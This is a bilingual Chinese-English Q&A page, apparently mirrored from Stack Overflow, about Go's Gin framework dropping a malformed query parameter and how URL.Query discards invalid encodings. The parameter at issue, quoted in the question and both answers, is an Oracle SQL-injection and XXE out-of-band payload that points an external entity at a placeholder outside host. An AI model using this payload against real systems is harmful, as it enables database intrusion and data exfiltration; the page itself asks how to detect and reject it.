请求中缺少查询参数。

huangapple go评论111阅读模式
英文:

Missing query parameter in request

问题

运行以下Go代码:

package main

import (
	"fmt"
	"github.com/gin-gonic/gin"
)

func main() {
	r := gin.Default()
	r.GET("/", func(c *gin.Context) {
		qParam, ok := c.GetQuery("fromDate") // qParam is nil
		query := c.Request.URL.Query() // query is empty
		rawQuery := c.Request.URL.RawQuery // contains the parameter
		fmt.Println(qParam, ok, query, rawQuery)
		c.JSON(200, gin.H{
			"message": "pong",
		})
	})
	r.Run("localhost:8181")
}

使用以下查询参数,Golang似乎没有返回它:

fromDate=%7bbase%7d%7c%7cextractvalue(xmltype('%3c!DOCTYPE%20root%20[%3c!ENTITY%20%%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3e%xxx%3b]%3e'),'%2fl')

尽管它存在于URL.RawQuery中:

调试截图

我需要访问这个值以便验证它并返回错误代码,但由于它被返回为nil,我无法做到这一点。

英文:

Running the following go code:

package main

import (
	"fmt"
	"github.com/gin-gonic/gin"
)

func main() {
	r := gin.Default()
	r.GET("/", func(c *gin.Context) {
		qParam, ok := c.GetQuery("fromDate") // qParam is nil
		query := c.Request.URL.Query() // query is empty
		rawQuery := c.Request.URL.RawQuery // contains the parameter
		fmt.Println(qParam, ok, query, rawQuery)
		c.JSON(200, gin.H{
			"message": "pong",
		})
	})
	r.Run("localhost:8181")
}

With the following query parameter, golang seems to not be returning it:

fromDate=%7bbase%7d%7c%7cextractvalue(xmltype('%3c!DOCTYPE%20root%20[%3c!ENTITY%20%%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3e%xxx%3b]%3e'),'%2fl')

Although it is present in the URL.RawQuery:
debug screenshot

I need to access this value so I can validate it and return an error code, but as it is returned as nil I cannot do that.

答案1

得分: 1

Gin的c.Query()URL.Query()是相同的:

如果存在,Query返回键入的URL查询值,否则返回空字符串("")。它是c.Request.URL.Query().Get(key)的快捷方式。

URL.Query()会默默地丢弃无效的参数。

你上面展示的查询参数是无效的。在调用服务器端点之前,你应该正确转义原始字符串。

如果这不在你的控制范围内,你可能就没办法了。你可以尝试修复原始参数,但这是任意的且不可扩展的。

记录一下,这是你原始查询字符串可能的样子:

{base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY  xxx SYSTEM {base}"http://{domain}/ext1"> xxx;]'),'/l')
英文:

Gin c.Query() and URL.Query() are the same:

> Query returns the keyed url query value if it exists, otherwise it returns an empty string (""). It is shortcut for c.Request.URL.Query().Get(key)

And URL.Query() silently discards invalid params.

The query param you showed above is invalid. You should properly escape the original string before calling the server endpoint.

If this is not under your control, you may just be out of luck. You could attempt fixing the raw param, but that is arbitrary and not scalable.

For the record, this is what your original query string might look like:

{base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY  xxx SYSTEM {base}"http://{domain}/ext1"> xxx;]>'),'/l')

答案2

得分: 1

如果你的原始查询字符串是:

fromDate={base}||extractvalue(xmltype('<!DOCTYPE root [<!ENTITY % xxx SYSTEM {base}"http://{domain}/ext1">%xxx;]>'),'/l')

那么你应该像这样对查询进行编码(我认为这不是一个好方法):

fromDate=%7bbase%7d%7c%7cextractvalue(xmltype('%3C!DOCTYPE%20root%20[%3C!ENTITY%20%25%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3E%25xxx%3b]%3E'),'%2fl')

因为你原始字符串中的'%'被编码为'%'而不是'%25',所以'%%'会被错误解析。

英文:

If your original query string is:

fromDate={base}||extractvalue(xmltype(&#39;&lt;!DOCTYPE root [&lt;!ENTITY % xxx SYSTEM {base}&quot;http://{domain}/ext1&quot;&gt;%xxx;]&gt;&#39;),&#39;/l&#39;)

then you should encode the query like this(i don't think it is a good way):

fromDate=%7bbase%7d%7c%7cextractvalue(xmltype(%27%3C!DOCTYPE%20root%20[%3C!ENTITY%20%25%20xxx%20SYSTEM%20%7bbase%7d%22http%3a%2f%2f%7bdomain%7d%2fext1%22%3E%25xxx%3b]%3E%27),%27%2fl%27)

because the '%' in your original string was encoded as '%' not '%25' so the '%%' would be parsed with error.

huangapple
  • 本文由 发表于 2021年9月16日 17:35:55
  • 转载请务必保留本文链接:https://go.coder-hub.com/69205940.html
匿名

发表评论

匿名网友

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen:

确定